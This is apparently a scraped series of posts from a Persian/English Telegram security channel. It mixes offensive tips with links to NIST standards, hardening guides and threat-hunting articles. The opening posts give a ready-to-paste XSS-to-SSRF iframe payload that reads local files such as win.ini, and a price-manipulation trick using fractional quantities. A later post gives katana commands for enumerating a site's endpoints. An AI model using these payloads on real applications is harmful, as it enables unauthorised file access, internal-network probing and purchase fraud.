⭐️𝐗𝐒𝐒 𝐭𝐨 𝐒𝐒𝐑𝐅 (𝐌𝐞𝐭𝐡𝐨𝐝 𝟐)⭐️

* Note this only works if proper sanitization is not performed and the server processes the payload server-side *

Input the following code in the vulnerable field:
<iframe src="http://localhost/some/directory"></iframe>

You can also read local files:
<iframe src="file:///C:/Windows/win.ini" width="500" height="500">

This is especially critical if an application is running on an EC2 instance that does not have IMDSv2 required.

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

Price Manipulation Method

If the product price parameter cannot be changed, change the quantity of products.

items[1][quantity]=1 --> 234 €
items[1][quantity]=0.1 --> 23.4 €

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

You can now passively enumerate all endpoints of a website with katana. (No need waybackurls)

Example:

echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | tee endpoints

You can then check the status of these endpoints or filter in order to find new vulnerabilities:

Example:

echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | httpx -mc 200 | grep -E '\.(js|php)$' | tee specificEndpoints

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

دزدی داده از طریق ICMP

https://blog.bwlryq.net/posts/icmp_exfiltration

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer/

پرورش استعداد ها در امنیت سایبری

راهکار استراتژیک
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

Infographics
The DoD Cybersecurity Policy Chart,
October 2024.
https://csiac.org/resources/the-dod-cybersecurity-policy-chart

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

Infosec Standards
NIST SP 800-63B-4:
"Digital Identity Guidelines. Authentication and Authenticator Management", August 2024.

NIST SP 800-63-4:
"Digital Identity Guidelines"
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-63-4.2pd.pdf

NIST SP 800-63A-4:
"Identity Proofing and Enrollment"
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-63A-4.2pd.pdf

NIST SP 800-63C-4:
"Federation and Assertions"
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-63C-4.2pd.pdf


National Institute of Standards and Technology (NIST)

——————————————————
#CyberSecurity #vCISO #NIST #AAA

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

Hardening
Enhanced Visibility and Hardening Guidance for Communications Infrastructure 2024.:

Network Infrastructure Security Guide, ver.1.2
https://media.defense.gov/2022/Jun/15/2003018261/-1/-1/0/CTR_NSA_NETWORK_INFRASTRUCTURE_SECURITY_GUIDE_20220615.PDF

Cisco Guide to Securing NX-OS Devices
https://sec.cloudapps.cisco.com/security/center/resources/securing_nx_os.html

Cisco IOS XE Hardening Guide, 2024
https://www.cisco.com/c/en/us/support/docs/ios-nx-os-software/ios-xe-16/220270-use-cisco-ios-xe-hardening-guide.html

——————————————————
#CyberSecurity #vCISO #CISA #Hardening
#SecureBusinessContinuity

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

Tech book
API Security for White Hat Hackers: Uncover offensive defense strategies and get up to speed with secure API implementation 2024.

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

Research
Unveiling Mac Security:
A Comprehensive Exploration of Sandboxing and AppData TCC 2024.
https://github.com/guluisacat/MySlides/tree/main/BlackHatUSA2024_KCon2024

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

Tech book
Ethical Password Cracking:
Decode passwords using John the Ripper, hashcat, and advanced methods for password breaking 2024.

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

Techbook
Malware Development:
The result of self-research and investigation of malware development tricks, evasion techniques and persistence 2022.

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

DFIR
Techbook
A Practical Hands-on Approach to Database Forensics.

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

Techbook
CloudSecurity
Cloud Hacking Playbook 2024.

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

Whitepaper
ThreatResearch
eBPF Security Threat Model 2024.

eBPF Verifier Code Review (.pdf)
https://github.com/ebpffoundation/publications

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

اسپلانک ؛ پیاده سازی UF با GPO

https://blog.edie.io/2020/03/28/deploying-splunk-universal-forwarders-via-gpo/amp/

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

بیایم از یک الگوریتم داده کاوی data mining برای کمک در شکار تهدیدات استفاده کنیم.

شناخت اوضاع غیر نرمال

https://www.huntandhackett.com/blog/kmeans-clustering-for-lateral-movement-detection

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

گزارش تحلیلی

وقتی کاربران ایرانی نمی‌توانند ادوبی را به روز کنند ممکن است در این دام بیفتند

https://blogs.jpcert.or.jp/en/2024/12/watering_hole_attack_part1.html

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer